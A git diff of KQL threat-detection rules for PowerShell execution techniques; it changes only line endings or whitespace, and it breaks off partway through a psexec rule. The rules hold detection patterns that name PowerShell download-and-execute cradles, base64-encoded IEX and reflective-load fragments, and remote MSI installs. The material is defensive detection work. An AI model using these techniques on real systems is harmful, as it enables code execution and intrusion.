-1,10 +1,10 @@ -// Title: PowerShell as a Service in Registry -// Author: oscd.community, Natalia Shornikova -// Date: 2020-10-06 -// Level: high -// Description: Detects that a powershell code is written to the registry as a service. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1569.002 - -DeviceRegistryEvents +// Title: PowerShell as a Service in Registry +// Author: oscd.community, Natalia Shornikova +// Date: 2020-10-06 +// Level: high +// Description: Detects that a powershell code is written to the registry as a service. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002 + +DeviceRegistryEvents | where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey endswith "\\Services*" and RegistryKey endswith "\\ImagePath" \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql b/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql index a8a14e98..5ad68d4b 100644 --- a/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql +++ b/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Base64 Encoded IEX Cmdlet -// Author: Florian Roth (Nextron Systems) -// Date: 2019-08-23 -// Level: high -// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: PowerShell Base64 Encoded IEX Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2019-08-23 +// Level: high +// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains "kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA") \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql b/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql index 41da956b..447a251d 100644 --- a/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql +++ b/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Base64 Encoded Invoke Keyword -// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t -// Date: 2022-05-20 -// Level: high -// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: PowerShell Base64 Encoded Invoke Keyword +// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t +// Date: 2022-05-20 +// Level: high +// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql b/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql index fdd6da7a..6e888d3f 100644 --- a/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql +++ b/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql @@ -1,12 +1,12 @@ -// Title: PowerShell Base64 Encoded Reflective Assembly Load -// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) -// Date: 2022-03-01 -// Level: high -// Description: Detects base64 encoded .NET reflective loading of Assembly -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, attack.t1620 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: PowerShell Base64 Encoded Reflective Assembly Load +// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) +// Date: 2022-03-01 +// Level: high +// Description: Detects base64 encoded .NET reflective loading of Assembly +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, attack.t1620 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql b/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql index 3c650e17..86b354b4 100644 --- a/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql +++ b/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Base64 Encoded WMI Classes -// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-30 -// Level: high -// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: PowerShell Base64 Encoded WMI Classes +// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-30 +// Level: high +// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud")) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql index c8b3ebc3..87303c9b 100644 --- a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql +++ b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql @@ -1,14 +1,14 @@ -// Title: PowerShell Core DLL Loaded By Non PowerShell Process -// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2019-11-14 -// Level: medium -// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process. -// Detects behavior similar to meterpreter's "load powershell" extension. -// MITRE Tactic: Execution -// Tags: attack.t1059.001, attack.execution -// False Positives: -// - Used by some .NET binaries, minimal on user workstation. -// - Used by Microsoft SQL Server Management Studio - -DeviceImageLoadEvents +// Title: PowerShell Core DLL Loaded By Non PowerShell Process +// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2019-11-14 +// Level: medium +// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process. +// Detects behavior similar to meterpreter's "load powershell" extension. +// MITRE Tactic: Execution +// Tags: attack.t1059.001, attack.execution +// False Positives: +// - Used by some .NET binaries, minimal on user workstation. +// - Used by Microsoft SQL Server Management Studio + +DeviceImageLoadEvents | where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not(((InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe", "C:\\Windows\\System32\\runscripthelper.exe", "C:\\WINDOWS\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "C:\\Windows\\System32\\winrshost.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\winrshost.exe", "C:\\Windows\\SysWOW64\\wsmprovhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe")))) and (not((isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath startswith "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or ((InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\") or (InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server Management Studio")) or (InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_download_and_execution_cradles.kql b/KQL/rules/Execution/powershell_download_and_execution_cradles.kql index 9717cb71..54afef52 100644 --- a/KQL/rules/Execution/powershell_download_and_execution_cradles.kql +++ b/KQL/rules/Execution/powershell_download_and_execution_cradles.kql @@ -1,12 +1,12 @@ -// Title: PowerShell Download and Execution Cradles -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-24 -// Level: high -// Description: Detects PowerShell download and execution cradles. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Some PowerShell installers were seen using similar combinations. Apply filters accordingly - -DeviceProcessEvents +// Title: PowerShell Download and Execution Cradles +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-24 +// Level: high +// Description: Detects PowerShell download and execution cradles. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Some PowerShell installers were seen using similar combinations. Apply filters accordingly + +DeviceProcessEvents | where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "irm ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression") \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_download_pattern.kql b/KQL/rules/Execution/powershell_download_pattern.kql index b36d6c9d..99ceb540 100644 --- a/KQL/rules/Execution/powershell_download_pattern.kql +++ b/KQL/rules/Execution/powershell_download_pattern.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Download Pattern -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019-01-16 -// Level: medium -// Description: Detects a Powershell process that contains download commands in its command line string -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: PowerShell Download Pattern +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-01-16 +// Level: medium +// Description: Detects a Powershell process that contains download commands in its command line string +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql b/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql index 2cf959b8..fc099042 100644 --- a/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql +++ b/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql @@ -1,12 +1,12 @@ -// Title: PowerShell Execution With Potential Decryption Capabilities -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-30 -// Level: high -// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: PowerShell Execution With Potential Decryption Capabilities +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-30 +// Level: high +// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql b/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql index dc383340..87aaddb7 100644 --- a/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql +++ b/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql @@ -1,10 +1,10 @@ -// Title: Powershell Inline Execution From A File -// Author: frack113 -// Date: 2022-12-25 -// Level: medium -// Description: Detects inline execution of PowerShell code from a file -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Powershell Inline Execution From A File +// Author: frack113 +// Date: 2022-12-25 +// Level: medium +// Description: Detects inline execution of PowerShell code from a file +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ") \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql index 96a353f1..44476920 100644 --- a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql +++ b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql @@ -1,13 +1,13 @@ -// Title: PowerShell MSI Install via WindowsInstaller COM From Remote Location -// Author: Meroujan Antonyan (vx3r) -// Date: 2025-06-05 -// Level: medium -// Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the -// Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely. -// This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality. -// And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: PowerShell MSI Install via WindowsInstaller COM From Remote Location +// Author: Meroujan Antonyan (vx3r) +// Date: 2025-06-05 +// Level: medium +// Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the +// Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely. +// This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality. +// And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "://127.0.0.1" or ProcessCommandLine contains "://localhost"))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql b/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql index 5d5ca8da..dd078f85 100644 --- a/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql +++ b/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql @@ -1,12 +1,12 @@ -// Title: PowerShell Script Execution Policy Enabled -// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo -// Date: 2023-10-18 -// Level: low -// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Likely - -DeviceRegistryEvents +// Title: PowerShell Script Execution Policy Enabled +// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo +// Date: 2023-10-18 +// Level: low +// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Likely + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts" \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_script_run_in_appdata.kql b/KQL/rules/Execution/powershell_script_run_in_appdata.kql index ab84e448..c45b5f25 100644 --- a/KQL/rules/Execution/powershell_script_run_in_appdata.kql +++ b/KQL/rules/Execution/powershell_script_run_in_appdata.kql @@ -1,12 +1,12 @@ -// Title: PowerShell Script Run in AppData -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019-01-09 -// Level: medium -// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Administrative scripts - -DeviceProcessEvents +// Title: PowerShell Script Run in AppData +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2019-01-09 +// Level: medium +// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents | where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql index d78c66d2..2307fbea 100644 --- a/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Process Reconnaissance Via Wmic.EXE -// Author: frack113 -// Date: 2022-01-01 -// Level: medium -// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Process Reconnaissance Via Wmic.EXE +// Author: frack113 +// Date: 2022-01-01 +// Level: medium +// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create"))) \ No newline at end of file diff --git a/KQL/rules/Execution/psexec_execution.kql b/KQL/rules/Execution/psexec_execution.kql index 8b319c6f..751630a8 100644 --- a/KQL/rules/Execution/psexec_execution.kql +++ b/KQL/rules/Execution/psexec_execution.kql @@ -1,12 +1,12 @@ -// Title: Psexec Execution -// Author: omkar72 -// Date: 2020-10-30 -// Level: medium -// Description: Detects user accept agreement execution in psexec commandline -// MITRE Tactic: Execution -// Tags: attack.execution, attack.lateral-movement, attack.t1569, attack.t1021 -// False Positives: -// - Administrative scripts. - -DeviceProcessEvents +// Title: Psexec Execution +// Author: omkar72 +// Date: 2020-10-30 +// Level: medium +// Description: Detects user accept agreement execution in psexec commandline +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1569, attack.t1021 +// False Positives: +// - Administrative scripts. + 